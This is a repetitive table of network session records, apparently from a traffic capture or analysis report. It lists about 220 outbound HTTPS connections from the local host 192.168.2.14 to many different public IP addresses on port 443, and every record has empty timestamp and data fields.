                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12110192.168.2.1433750171.133.171.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12111192.168.2.1458610163.211.10.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12112192.168.2.145563283.220.234.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12113192.168.2.1452622189.227.87.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12114192.168.2.144224473.3.59.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12115192.168.2.1435250143.205.5.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12116192.168.2.1454866136.207.204.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12117192.168.2.144000676.19.200.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12118192.168.2.1432850134.122.130.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12119192.168.2.143673870.21.119.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12120192.168.2.1441922130.197.100.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12121192.168.2.1449866168.114.169.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12122192.168.2.144655635.90.254.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12123192.168.2.1443190199.209.163.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12124192.168.2.1447980186.134.68.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12125192.168.2.1443730139.89.36.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12126192.168.2.1454520212.146.10.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12127192.168.2.143853441.36.222.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12128192.168.2.1443798116.241.44.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12129192.168.2.1443422170.165.144.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12130192.168.2.1441430150.133.148.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12131192.168.2.1433610158.146.57.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12132192.168.2.143445820.78.223.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12133192.168.2.145136643.66.251.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12134192.168.2.14401285.168.143.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12135192.168.2.143939887.230.43.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12136192.168.2.144785853.79.184.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12137192.168.2.144236059.93.133.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12138192.168.2.144616858.188.152.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12139192.168.2.145907660.24.195.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12140192.168.2.1437942135.29.88.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12141192.168.2.1432914166.189.149.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12142192.168.2.1447080140.142.250.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12143192.168.2.1455436170.115.63.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12144192.168.2.144113052.156.20.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12145192.168.2.1439920126.10.101.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12146192.168.2.1457316162.254.105.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12147192.168.2.1438720108.113.21.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12148192.168.2.1437064178.254.225.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12149192.168.2.1456844142.155.231.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12150192.168.2.14452989.59.238.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12151192.168.2.1436770117.240.10.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12152192.168.2.1451840149.207.166.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12153192.168.2.145742049.235.53.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12154192.168.2.145247640.3.122.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12155192.168.2.1457812100.16.66.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12156192.168.2.1439570134.148.62.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12157192.168.2.1455610186.16.39.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12158192.168.2.1444866132.182.253.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12159192.168.2.144200013.254.227.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12160192.168.2.144756482.7.253.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12161192.168.2.1459204103.153.194.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12162192.168.2.1459950105.6.10.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12163192.168.2.1442348161.202.79.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12164192.168.2.1443192146.77.230.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12165192.168.2.1457940199.177.138.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12166192.168.2.1444036123.164.141.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12167192.168.2.1457188170.2.100.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12168192.168.2.1449534211.126.234.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12169192.168.2.1458698219.46.195.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12170192.168.2.144503089.20.177.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12171192.168.2.145555858.133.232.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12172192.168.2.145644232.95.243.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12173192.168.2.14564841.64.81.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12174192.168.2.1442350139.204.191.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12175192.168.2.144413079.86.150.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12176192.168.2.143797213.124.84.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12177192.168.2.1439530119.30.185.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12178192.168.2.1456394156.180.240.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12179192.168.2.1446010207.223.88.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12180192.168.2.1435814192.8.199.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12181192.168.2.1460008130.12.108.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12182192.168.2.1440342199.34.93.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12183192.168.2.14577722.227.124.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12184192.168.2.144557848.243.148.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12185192.168.2.144866073.122.253.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12186192.168.2.1450852208.136.12.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12187192.168.2.1450946223.234.243.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12188192.168.2.1456956154.176.96.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12189192.168.2.1456026207.146.155.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12190192.168.2.144969014.254.26.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12191192.168.2.1444018151.243.0.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12192192.168.2.144949063.245.58.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12193192.168.2.14468582.209.57.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12194192.168.2.144979283.30.149.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12195192.168.2.145714019.11.252.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12196192.168.2.1435812113.55.218.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12197192.168.2.1451106154.148.165.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12198192.168.2.144106080.121.166.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12199192.168.2.1441058140.199.9.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12200192.168.2.1437396209.129.240.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12201192.168.2.145952817.199.138.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12202192.168.2.144750882.201.194.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12203192.168.2.1442398183.147.249.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12204192.168.2.1451388178.70.72.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12205192.168.2.1456232113.111.169.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12206192.168.2.145444439.240.129.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12207192.168.2.1458210121.49.175.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12208192.168.2.1447054153.8.5.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12209192.168.2.14524961.211.129.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12210192.168.2.1438578137.224.160.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12211192.168.2.145419051.78.89.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12212192.168.2.1448710169.217.10.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12213192.168.2.145095854.108.226.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12214192.168.2.1443642183.19.32.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12215192.168.2.143297883.168.92.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12216192.168.2.145739434.23.116.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12217192.168.2.145179496.193.234.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12218192.168.2.1454274140.233.202.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12219192.168.2.143439839.38.90.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12220192.168.2.143970627.85.252.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12221192.168.2.1458674186.213.157.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12222192.168.2.1458902110.206.139.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12223192.168.2.145072888.156.235.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12224192.168.2.1457910136.57.158.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12225192.168.2.145455224.46.83.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12226192.168.2.1443970129.193.50.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12227192.168.2.143304470.18.74.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12228192.168.2.1456928146.239.70.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12229192.168.2.1448610143.39.123.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12230192.168.2.145845435.73.62.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12231192.168.2.1453996158.175.117.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12232192.168.2.1446330156.52.183.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12233192.168.2.1432988209.181.204.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12234192.168.2.1440856211.143.125.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12235192.168.2.145350634.23.152.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12236192.168.2.144281240.25.39.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12237192.168.2.1453916128.19.14.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12238192.168.2.144201485.227.176.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12239192.168.2.143551057.34.131.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12240192.168.2.1432880169.116.67.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12241192.168.2.1458488216.238.20.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12242192.168.2.1442884217.190.106.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12243192.168.2.14516788.198.142.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12244192.168.2.145173092.44.159.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12245192.168.2.1455858151.143.25.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12246192.168.2.1458890124.78.248.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12247192.168.2.1443952123.19.21.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12248192.168.2.144537620.16.64.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12249192.168.2.1452344151.250.165.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12250192.168.2.1438570180.80.109.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12251192.168.2.1450650136.223.202.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12252192.168.2.1448622121.67.8.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12253192.168.2.1452544219.53.149.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12254192.168.2.1450270193.227.239.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12255192.168.2.144090486.76.64.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12256192.168.2.1444556202.125.77.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12257192.168.2.145759838.27.236.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12258192.168.2.1443422148.77.165.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12259192.168.2.1442848149.197.106.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12260192.168.2.145798865.137.238.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12261192.168.2.1445266209.176.164.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12262192.168.2.1458214116.70.135.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12263192.168.2.1460368185.189.184.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12264192.168.2.1434036222.170.115.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12265192.168.2.143358863.104.203.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12266192.168.2.145388440.30.129.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12267192.168.2.1449260106.110.158.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12268192.168.2.1441124135.230.246.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12269192.168.2.1444564124.212.30.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12270192.168.2.1452622137.113.2.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12271192.168.2.1441092184.52.9.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12272192.168.2.146019678.15.13.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12273192.168.2.1452712192.230.191.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12274192.168.2.145880293.167.195.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12275192.168.2.1445298123.35.130.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12276192.168.2.144409235.18.71.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12277192.168.2.143835090.78.190.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12278192.168.2.1447708124.0.189.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12279192.168.2.1458324158.137.98.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12280192.168.2.1445508173.168.54.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12281192.168.2.143426861.98.40.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12282192.168.2.146094280.208.164.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12283192.168.2.1443904182.112.33.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12284192.168.2.143737236.108.156.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12285192.168.2.145672884.186.0.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12286192.168.2.1451638196.103.89.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12287192.168.2.1454224180.95.15.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12288192.168.2.1456138100.237.109.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12289192.168.2.1452316118.37.205.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12290192.168.2.1433966199.69.253.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12291192.168.2.143798497.86.209.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12292192.168.2.144859468.41.165.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12293192.168.2.14391128.41.154.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12294192.168.2.1456396217.200.245.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12295192.168.2.1445170119.88.220.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12296192.168.2.1433344163.199.48.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12297192.168.2.143571887.106.144.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12298192.168.2.1434744217.55.191.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12299192.168.2.144444083.183.252.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12300192.168.2.1433418126.141.228.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12301192.168.2.1434236175.100.66.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12302192.168.2.143337832.221.202.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12303192.168.2.1434042118.91.28.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12304192.168.2.1446484159.116.205.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12305192.168.2.1452416118.75.214.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12306192.168.2.1447280157.3.190.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12307192.168.2.144192877.63.15.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12308192.168.2.1460884146.165.35.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12309192.168.2.1454778105.70.140.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12310192.168.2.1456098109.104.41.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12311192.168.2.143905849.208.176.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12312192.168.2.143491617.78.70.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12313192.168.2.1458500180.252.173.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12314192.168.2.1440254204.225.37.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12315192.168.2.145044672.6.254.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12316192.168.2.143771853.107.81.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12317192.168.2.14329282.183.199.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12318192.168.2.1435226180.200.209.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12319192.168.2.144831069.48.80.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12320192.168.2.144043688.214.181.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12321192.168.2.1456490148.177.244.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12322192.168.2.144040647.112.41.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12323192.168.2.1434110105.91.144.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12324192.168.2.144570251.188.10.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12325192.168.2.14371765.150.15.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12326192.168.2.1454052130.141.197.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12327192.168.2.145079680.244.142.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12328192.168.2.143924462.237.248.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12329192.168.2.143609646.205.247.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12330192.168.2.1444738198.138.31.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12331192.168.2.145558679.206.247.94443
